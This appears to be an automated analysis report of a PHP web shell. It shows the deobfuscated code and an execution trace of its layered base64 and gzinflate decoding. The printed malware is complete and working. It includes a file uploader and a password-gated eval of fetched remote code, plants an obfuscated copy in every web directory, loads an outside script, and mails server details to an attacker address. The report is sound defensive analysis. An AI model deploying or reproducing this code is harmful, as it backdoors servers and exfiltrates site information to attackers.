PHP Malware Analysis

Up.php.html, Up.phtml, upp.php

md5: c61b501340d047ae37bf04d114d9fa20

Jump to:

Screenshot


Attributes

Emails

Encoding

Environment

Execution

Files

Input

Title

URLs
  • http://localhost/uploads/Up.php.html (Traces)
  • http://localhost/uploads/Up.phtml (Traces)
  • http://localhost/uploads/upp.php (Traces)
  • http://teledramasinhala.com/img/icons/image.js (Deobfuscated, HTML, Traces)


Deobfuscated PHP code

<?php

$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$gzinflate = "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";
eval /* PHPDeobfuscator eval output */ {
    error_reporting(0);
    echo "<title>Uploader</title>";
    echo "<center><font color=\"#11f0f3\"><form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"></center>";
    echo "<center><input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form></font><center>";
    if ($_POST['_upl'] == "Upload") {
        if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
            echo "<center><br><br><b><font color=\"#11f0f3\">UPLOAD SUCCESS!</font></b></center><br><br>";
        } else {
            echo "<center><br><br><b><font color=\"#f31111\">UPLOAD FAILED!</font></b></center><br><br>";
        }
    }
    @session_start();
    @error_reporting(0);
    $a = '<?php

$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA";
eval(htmlspecialchars_decode(urldecode(base64_decode($gz))));

?>
<form action="" method="post">
<input type="text" name="p">
</form>
';
    if (@$_REQUEST["px"]) {
        $p = @$_REQUEST["px"];
        $pa = md5(sha1($p));
        if ($pa == "7e2cb042f3fd80e5a826735222585fde") {
            echo eval(@file_get_contents(@$_REQUEST["404"]));
        }
    }
    if (@(!$_SESSION["sdm"])) {
        $doc = $_SERVER["DOCUMENT_ROOT"];
        $dir = scandir($doc);
        $d1 = '' . $doc . '/.';
        $d2 = '' . $doc . '/..';
        if (($key = @array_search('.', $dir)) !== false) {
            unset($dir[$key]);
        }
        if (($key = @array_search('..', $dir)) !== false) {
            unset($dir[$key]);
        }
        if (($key = @array_search($d1, $dir)) !== false) {
            unset($dir[$key]);
        }
        if (($key = array_search($d2, $dir)) !== false) {
            unset($dir[$key]);
        }
        @array_push($dir, $doc);
        foreach ($dir as $d) {
            $p = $doc . "/" . $d;
            if (is_dir($p)) {
                $file = $p . "/style-js.php";
                @touch($file);
                $folder = @fopen($file, "w");
                @fwrite($folder, $a);
            }
        }
    }
    ?>
<script src=http://teledramasinhala.com/img/icons/image.js></script>
<?php 
    $a = "hacklinksatis@gmail.com";
    $b = "upload script";
    $c = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
    $c .= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n";
    $c .= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n";
    $c .= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n";
    $c .= "Avlanan Site : " . $_SERVER['HTTP_HOST'] . "\r\n";
    mail($a, $b, $c);
};
exit;

Execution traces

data/traces/c61b501340d047ae37bf04d114d9fa20_trace-1676242546.3529.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:56:12.250756]
1	0	1	0.000204	393512
1	3	0	0.000269	396944	{main}	1		/var/www/html/uploads/upp.php	0	0
1		A						/var/www/html/uploads/upp.php	3	$gz = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
1		A						/var/www/html/uploads/upp.php	4	$gzinflate = 'O3gvY0lh+owA/d9r1rcLg9tNAnwU0iX9PyUvNOn+NuRSz7rvZzwJACPMsp6z9tlfzu+XI9i6En+VFFC/B+kumtsZQHLhsh3D6PIKaqjnDTyZnzliSw0euoDiB7gqnevZdq2V/wvbd+eH0V8IWsRhQYOmPXDi+9DRYFcPUewVJDKO9JMiFBftj7ugDILfWjy4z3UHsKUffh4FGYXXR4EYgz1Lp4AoI064w6KAa7STRnPX+uOEVwOJ2S3CDYtEAweOhcHHV+dQcihBPzBQchgZGFBRS+ygKxmlQApKCQHMmIb5mf4H+WkjLYhwsSkSK3RD1Kb0bJ+tQkV9s4FQ/0ilegHCWxXavd5JaU+ym/bqWu4XvMhlsfGJ52PG3JUdigwJtc6mI18KJHsGeeVnH2G3A7rX2FdioAa7/ocUkfFwCDAJRsAaB8hUIv5xL4DhOSs1NwxnY++85YY/H9XxLezH/T9T9b1junxxy5SKiig9yK4ravKAzGhY8VidRF5zJfmk'
2	4	0	0.000332	396944	base64_decode	0		/var/www/html/uploads/upp.php	5	1	'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg=='
2	4	1	0.000354	397232
2	4	R			'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	0	0.000375	397200	urldecode	0		/var/www/html/uploads/upp.php	5	1	'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B'
2	5	1	0.000394	397456
2	5	R			'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	0	0.000413	397168	htmlspecialchars_decode	0		/var/www/html/uploads/upp.php	5	1	'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	6	1	0.000431	397392
2	6	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'
2	7	0	0.000462	399520	eval	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));'	/var/www/html/uploads/upp.php	5	0
3	8	0	0.000479	399520	strrev	0		/var/www/html/uploads/upp.php(5) : eval()'d code	1	1	'O3gvY0lh+owA/d9r1rcLg9tNAnwU0iX9PyUvNOn+NuRSz7rvZzwJACPMsp6z9tlfzu+XI9i6En+VFFC/B+kumtsZQHLhsh3D6PIKaqjnDTyZnzliSw0euoDiB7gqnevZdq2V/wvbd+eH0V8IWsRhQYOmPXDi+9DRYFcPUewVJDKO9JMiFBftj7ugDILfWjy4z3UHsKUffh4FGYXXR4EYgz1Lp4AoI064w6KAa7STRnPX+uOEVwOJ2S3CDYtEAweOhcHHV+dQcihBPzBQchgZGFBRS+ygKxmlQApKCQHMmIb5mf4H+WkjLYhwsSkSK3RD1Kb0bJ+tQkV9s4FQ/0ilegHCWxXavd5JaU+ym/bqWu4XvMhlsfGJ52PG3JUdigwJtc6mI18KJHsGeeVnH2G3A7rX2FdioAa7/ocUkfFwCDAJRsAaB8hUIv5xL4DhOSs1NwxnY++85YY/H9XxLezH/T9T9b1junxxy5SKiig9yK4ravKAzGhY8VidRF5zJfmk'
3	8	1	0.000505	402112
3	8	R			'AR8G4PkBGgbl+QEVBur5eJwBCgb1+XictVb7b+I4EP59pf0fsjkkqLrXhHe7LV3CIwSWV3kUQlUhx3FIwHk0NlA47f9+dlJa2u7urXR3ERa2v5lvxuPx2FdfAzv4+AGFoR/OQxT4IXW8RUo+uWST0PaF5BV1KEbX4wD7wEThlRSPky8CEHkUhddXlu9RAfrYD0viH+m0JVtZkc+GrgAgdXyvJIqCi6jtmyUx8AkVBeRBugtQSXTXmDoBCKnE5f80AQWi4AGXQesny6LgmEej6yvpyfAPXHG8YE2FmNpyMDpwxX3i7Fk/L4sHwRicM27xSYmsDdehscl4fgPwmgFxHLh17mj059HrqyNXHCslJOb93nB0l+SqyXuhVBIOisKJ8FckU4Z+sEsl5mqzXR/eJblnyfu7JHWDOXcnef9ZeAfGwAmjEN4s2Di0n2zDuN/uKTVhOK5W68Php4PbkvESxgNH8lL4zgKKCfp9M1Y2zb5nM6rC/K79hhX2+3r98cNV'
3	9	0	0.000533	402080	base64_decode	0		/var/www/html/uploads/upp.php(5) : eval()'d code	1	1	'AR8G4PkBGgbl+QEVBur5eJwBCgb1+XictVb7b+I4EP59pf0fsjkkqLrXhHe7LV3CIwSWV3kUQlUhx3FIwHk0NlA47f9+dlJa2u7urXR3ERa2v5lvxuPx2FdfAzv4+AGFoR/OQxT4IXW8RUo+uWST0PaF5BV1KEbX4wD7wEThlRSPky8CEHkUhddXlu9RAfrYD0viH+m0JVtZkc+GrgAgdXyvJIqCi6jtmyUx8AkVBeRBugtQSXTXmDoBCKnE5f80AQWi4AGXQesny6LgmEej6yvpyfAPXHG8YE2FmNpyMDpwxX3i7Fk/L4sHwRicM27xSYmsDdehscl4fgPwmgFxHLh17mj059HrqyNXHCslJOb93nB0l+SqyXuhVBIOisKJ8FckU4Z+sEsl5mqzXR/eJblnyfu7JHWDOXcnef9ZeAfGwAmjEN4s2Di0n2zDuN/uKTVhOK5W68Php4PbkvESxgNH8lL4zgKKCfp9M1Y2zb5nM6rC/K79hhX2+3r98cNV'
3	9	1	0.000562	404672
3	9	R			'\001\037\006�\001\032\006�\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G'
3	10	0	0.000637	402080	gzinflate	0		/var/www/html/uploads/upp.php(5) : eval()'d code	1	1	'\001\037\006�\001\032\006�\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G'
3	10	1	0.000714	403904
3	10	R			'\001\032\006�\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3'
3	11	0	0.000785	401312	gzinflate	0		/var/www/html/uploads/upp.php(5) : eval()'d code	1	1	'\001\032\006�\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3'
3	11	1	0.000854	403136
3	11	R			'\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\0'
3	12	0	0.000924	401312	gzinflate	0		/var/www/html/uploads/upp.php(5) : eval()'d code	1	1	'\001\025\006�x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\0'
3	12	1	0.000995	403136
3	12	R			'x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\025��z���U��e�\'
3	13	0	0.001111	401312	gzuncompress	0		/var/www/html/uploads/upp.php(5) : eval()'d code	1	1	'x�\001\n\006��x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\025��z���U��e�\'
3	13	1	0.001180	403136
3	13	R			'x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\025��z���U��e�\bay2\'�eB��`��'
3	14	0	0.001249	401312	gzuncompress	0		/var/www/html/uploads/upp.php(5) : eval()'d code	1	1	'x��V�o�8\020�}��\037�9$��ׄw�-]�#\004�Wy\024BU!�qH�y46P8�~vRZ���tw\021\026���o����W_\003;��\001��\037�C\024�!u�EJ>�d����\025u(F��\000��D�\024��/\002\020y\024��W��Q\001��\017K�\037�%[Y�φ�\000 u|�$�����%1�\t\025\005�A�\vPItט:\001\b���4\001\005��\001�A�\'ˢ�G��+���\017\\q�`M���r0:p�}��Y?/�\a�\030�3n�I��\rס��x~\003�\001q\034�u�h����#W\034+%$��pt���{�T\022\016�‰�W$S�~�K%�j�]\037�%�g��$u�9w\'y�Yx\a�\t�\020�,�8��lø��)5a8�V��ᧃے�\022�\003G�R��\002�\t�}3V6;g3�����\025��z���U��e�\bay2\'�eB��`��'
3	14	1	0.001340	405440
3	14	R			'<?php\r\nerror_reporting(0);\r\necho \'<title>Uploader</title>\';\r\necho \'<center><font color="#11f0f3"><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"></center>\';\r\necho \'<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></font><center>\';\r\nif( $_POST[\'_upl\'] == "Upload" ) {\r\nif(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<center><br><br><b><font color="#11f'
3	15	0	0.001472	423640	eval	1	'?><?php\r\nerror_reporting(0);\r\necho \'<title>Uploader</title>\';\r\necho \'<center><font color="#11f0f3"><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"></center>\';\r\necho \'<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></font><center>\';\r\nif( $_POST[\'_upl\'] == "Upload" ) {\r\nif(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<center><br><br><b><font color="#11f0f3">UPLOAD SUCCESS!</font></b></center><br><br>\'; }\r\nelse { echo \'<center><br><br><b><font color="#f31111">UPLOAD FAILED!</font></b></center><br><br>\'; }\r\n}\r\n?>\r\n<?php\r\n@session_start();\r\n@error_reporting(0);\r\n$a = \'<?php\r\n\r\n$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";\r\n$gzinflate = "=kNpMtH71+ljPksZMcCcwcK+3fDlWgk7NrBwORQ/WY/zBOoBN4X5VZLsGffsu1D7GtfN+HA/jfc4llGsPjjJ9bYdzfpXuEKc5lgWShDAjYIIyjLEB6sJ7xwmW/t3sAjUdNhc365UYm35GrrxT/tH/rnbb1CtIqbEcyy3idRJJkv+7+nmXjdVY/WLfqnB02J4O1fe/7lAU0MajUGZSsHwKqhmHzv900i0h3YtoOCJcosuAHEtpAimJmdmoFCB2NZlgqVobRLXemwlekB8PSBazZLFbIHPfRsqapn5Z2WFCGLcWb5Ls9hJahXA7YV+RHfRiYvgTQpUFHyk8tcxG2ovhQOTquhQ66yaMV9H6FEhemC6vu7woIlYFCFlmOADdmcnyI39588cbGYIw42qSs//TI4HhYD0z0ItUW6T0Zs4GozL1SjnL3tNWA5gc9D9v0HFwI8adFVbcin/sGwUBwJe+HaAeFg/cGwYB4/lBgWA";\r\neval(htmlspecialchars_decode(urldecode(base64_decode($gz))));\r\n\r\n?>\r\n<form action="" method="post">\r\n<input type="text" name="p">\r\n</form>\r\n\';\r\nif (@$_REQUEST["px"]) {\r\n    $p = @$_REQUEST["px"];\r\n    $pa = md5(sha1($p));\r\n    if ($pa == "7e2cb042f3fd80e5a826735222585fde") {\r\n        echo eval(@file_get_contents(@$_REQUEST["404"]));\r\n    }\r\n}\r\nif (@!$_SESSION["sdm"]) {\r\n    $doc = $_SERVER["DOCUMENT_ROOT"];\r\n    $dir = scandir($doc);\r\n    $d1 = \'\' . $doc . \'/.\';\r\n    $d2 = \'\' . $doc . \'/..\';\r\n    if (($key = @array_search(\'.\', $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    if (($key = @array_search(\'..\', $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    if (($key = @array_search($d1, $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    if (($key = array_search($d2, $dir)) !== false) {\r\n        unset($dir[$key]);\r\n    }\r\n    @array_push($dir, $doc);\r\n    foreach ($dir as $d) {\r\n        $p = $doc . "/" . $d;\r\n        if (is_dir($p)) {\r\n            $file = $p . "/style-js.php";\r\n            @touch($file);\r\n            $folder = @fopen($file, "w");\r\n            @fwrite($folder, $a);\r\n        }\r\n    }\r\n   \r\n}\r\n?>\r\n<script src=http://teledramasinhala.com/img/icons/image.js></script>\r\n<?php\r\n$a = "hacklinksatis@gmail.com";\r\n$b = "upload script";\r\n$c = "Dosya Yolu : " . $_SERVER[\'DOCUMENT_ROOT\'] . "\r\n";\r\n$c.= "Server Admin : " . $_SERVER[\'SERVER_ADMIN\'] . "\r\n";\r\n$c.= "Server isletim sistemi : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\r\n";\r\n$c.= "Shell Link : http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'PHP_SELF\'] . "\r\n";\r\n$c.= "Avlanan Site : " . $_SERVER[\'HTTP_HOST\'] . "\r\n";\r\nmail($a, $b, $c);\r\n?>'	/var/www/html/uploads/upp.php(5) : eval()'d code	1	0
4	16	0	0.001556	423640	error_reporting	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	2	1	0
4	16	1	0.001572	423680
4	16	R			22527
4	17	0	0.001589	423640	session_start	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	12	0
4	17	1	0.001644	424392
4	17	R			TRUE
4	18	0	0.001660	424392	error_reporting	0		/var/www/html/uploads/upp.php(5) : eval()'d code(1) : eval()'d code	13	1	0
4	18	1	0.001675	424432
4	18	R			0
